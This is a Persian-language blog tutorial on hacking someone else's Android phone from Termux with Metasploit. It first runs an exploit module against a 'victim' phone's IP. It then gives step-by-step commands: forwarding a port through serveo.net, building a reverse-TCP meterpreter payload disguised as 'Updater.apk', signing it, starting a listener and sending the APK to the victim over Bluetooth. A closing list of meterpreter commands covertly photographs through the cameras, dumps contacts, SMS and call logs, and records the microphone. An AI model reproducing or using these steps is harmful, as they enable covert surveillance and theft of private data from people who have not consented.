آموزش هک گوشی با ترموکس – termux

سلام خدمت کاربران مجله آی تی همه این سوال واسه تون پیش میاد یا از خود من میپرسین چجوری گوشی یک نفر بدون اینکه بهشون فایل مخرب بدیم هک کنیم. ما در این آموزش میخوام به شما آموزش هک گوشی با ترموکس ( termux ) را بدهیم تا اخر این آموزش با ماه همراه باشید.

آموزش نصب متااسپلویت در ترموکس

مطالب مرتبط

• کتاب هنر اکسپلویت نویسی
• هک وای فای قوی
• آموزش هک دوربین مداربسته
• آموزش‌ ساخت رات به ترموکس

آموزش هک گوشی با ترموکس – termux

خوب دوستان میریم برای آموزش.  اکسپلویت این آسیب پذیری برروی متااسپلویت ( metasploit ) وجود داره و ما خیلی راحت میتونیم از این اکسپلویت استفاده کنیم ، پس من در قدم اول دستور msfconsole رو میزنم تا متااسپلویت برای من اجرا بشه

بعد از اجرای metasploit با دستور search اکسپلویت مورد نظرمو سرچ میکنم

بعد از اجرای دستور بالا که دستور سرچ بود حالا دستور use اکسپلویت رو انتخاب میکنم

بعد از انتخاب کردن اکسپلویت ( Exploit ) با دستور show options تنظیمات مربوط به این اکسپلویت رو میبینیم

موارد مهم را به ترتیب تنظیم می کنیم ، اولین مورد RHOSTS است ، یعنی IP گوشی قربانی است که می توانید IP گوشی را به راحتی دریافت کنید (یک ابزار گرافیکی به نام Fing Network Tools برای موبایل وجود دارد که به راحتی می توانید IP های کسانی که هستند را مشاهده کنید.

بعد از تنظیم کردن ip تارگت دستور show action رو بزنید تا لیست کارهایی که ما میتونیم روی گوشی قربانی انجام بدیم رو بهمون بده

خب بعد از دیدن لیست کار هایی که ما میتونیم روی گوشی قربانی انجام بدیم کافیه که با دستور set action  و بعد از دستوری که میخواهید روی گوشی اجرا بشه اینکار رو انجام بدید

بعد از تنظیم کردن دستور بالا کافیه که run رو بزنید و منتظر باشید تا نتیجه رو به شما برگردونه.

خب میبینید که دستور اجرا شد و  داره name رو به ما من نشون میده حالا من دستور رو عوض میکنم و میخام که لیست فایل های صوتی رو ببینم

و تمام روش اول تموم شد موفق و پیروز باشید.

روش دوم آموزش هک گوشی با ترموکس

پیش نیاز های هک گوشی با ترموکس

• نرم افزار Android TermuX (دانلود از فروشگاه Play)
•  فریم ورک Metasploit نصب شده در TermuX (آموزش در اینجا)
•  اینترنت فعال / اتصال WiFi
• TermuX باید اجازه استفاده از Storage External را داشته باشد (برای این منظور فقط یکبار این فرمان را وارد کنید: “termux-setup-storage”)
•  MiXplorer (برای امضای فایل APK، آن را از وب سایت UpToDown دانلود کنید)
•  Apk Signer) MiX Signer برای MiXplorer، دانلود آن از فروشگاه Play)
• از صفحه کلید هکر در خط فرمان TermuX استفاده کنید.

Port Forwarding

بسیاری از افراد از NGROK برای درگاه Port Forwarding استفاده می کنند. اما در NGROK ، می توانید هنگام اتصال مجدد به دامنه یا پورت جدید ، ایجاد کنید. دامنه و پورت اختصاصی فقط برای کاربران خاص است. به همین دلیل ، هر زمان که شروع به هک کنید ، باید یک فایل APK جدید برای NGROK ایجاد کنید.

در این آموزش ما از Serveo استفاده می کنیم. در Serveo ، می توانید دستی خود را در اینترنت بارگذاری کنید. برای استفاده از پورت Forveo forwarding ، باید بسته OpenSSH را روی TermuX نصب کنید. برای انجام این کار ، دستور زیر را در TermuX وارد کنید:

pkg install openssh

پس از نصب، این دستور را تایپ کنید:

ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net

در اینجا چند نکته وجود دارد که باید بخاطر بسپارید. اگر می خواهید پورت HTTP را فوروارد کنید ، پورت های مختلف را در هر دو بخش “Desired_Port” انتخاب کنید. اما در اینجا می خواهیم پورت TCP را جابجا کنیم. برای فرستنده پورت TCP ، باید همان پورت ها را در پورت Desired_Ports وارد کنید. همچنین “localhost” را تغییر ندهید. در اینجا ما می خواهیم یک پورت TCP را به جلو هدایت کنیم (برای مثال ۴۵۶۴). بعد از پورت جلو ، ممکن است اینگونه باشد:

ساخت فایل apk به همراه پیلود جاسازی شده

برای ایجاد فایل APK با Embedload Payload، این دستور را در ترموکس وارد میکنیم:

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R
> storage/downloads/Updater.apk

بعد از چند ثانیه منتظر ماندن:

همینجور که میبینید  میکنید فایل APK با پیلود جاسازی شده با موفقیت برای ما ساخته شد. Phone/SD-Card Storage -> downloads -> Updater.apk

همچنین شما می توانید با استفاده از برنامه APK Editor Pro نام (Default: MainActivity) و نسخه فایل APK تولید شده را تغییر دهید.

امضای فایل جدید APK ایجاد شده

ابتدا مدیر فایل MiXplorer را باز کنید و به فایل (APK Un-Signed (Updater.apk بروید.(در پوشه ی آپلود قرار می گیرد).

APK Un-Signed (Updater.apk) را کلیک کنید و دکمه MENU را در گوشه سمت راست بالای MiXplorer انتخاب کنید ، سپس “SUBSCRIBE” را انتخاب کنید.

این گزینه امضای فایل APK را به ما نشان می دهد. برای امضای خودکار و موفقیت آمیز فایل APK ، AUTO را انتخاب کنید.

در حال حاضر، فایل APK شما با نام filename)-signed.apk) با موفقیت امضا شده است و حجم ان نیز ۹٫۹KB میباشد.

راه اندازی Metasploit در TermuX

با وارد کردن دستور زیر در پنجره جدید ترموکس، چارچوب Metasploit را در TermuX فعال کنید:

msfconsole

برای نصب متاسپلویت به اول مقاله برین و نصب کنید

اگر این خطا را دریافت کردید: “Failed to connect to the database”، همانطور که در تصویر زیر نشان داده شد، دستورات زیر را در NEW SESSION وارد کنید.

mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start

بعد از چند ثانیه منتظر ماندن:

بعد از اینکه ابزار msfconsole شروع به کار می کند، دستورات زیر را با دقت وارد کنید:

msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set LPORT 4564
msf> exploit -j -z

نصب APK در گوشی Android تارگت

شما باید فایل Payload-Signed.apk را به دستگاه اندرویدی قربانی خود (مثلاً از طریق بلوتوث) -> نصب -> سپس باز کنید (مطمئن شوید دستگاه قربانی از اتصال اینترنتی فعال برخوردار است).

پس از باز کردن پرونده APK در تلفن قربانی ، فعال شدن جلسه Meterpreter را در بخش Metasploit خود مشاهده خواهید کرد. برای باز کردن یک جلسه Meterpreter از دستگاه قربانی خود ، روی دکمه برگشت کلیک کنید و این دستور را در جلسه Metasploit خود وارد کنید:

(sessions -i (Session ID

در (شناسه جلسه)، شماره جلسه Meterpreter را انتخاب کنید (به عنوان مثال هنگامی که قربانی شما فایل APK را باز می کند، این پیام را میبینید: Meterpreter Session Opened 1، در اینجا، ۱، شناسه جلسه Meterpreter است).

شما با موفقیت از Android دستگاه قربانی خود دسترسی گرفتید.

در محیط متااسپلویت نیاز به راهنمایی دارید:

می توانید فرمان {meterpreter> help} را برای مشاهده تمام دستورات در دسترس وارد کنید.

از جمله دستورات مهم:

گرفتن تصویر از دوربین ها

webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg

webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg

دریافت همه مخاطبین

dump_contacts -o storage/downloads/X-Contacts.txt

دریافت همه پیام ها

dump_sms -o storage/downloads/X-SMS.txt

دریافت تماس های ورودی

dump_calllog -o storage/downloads/X-CallLog.txt

جاسوسی از طریق میکروفون

record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3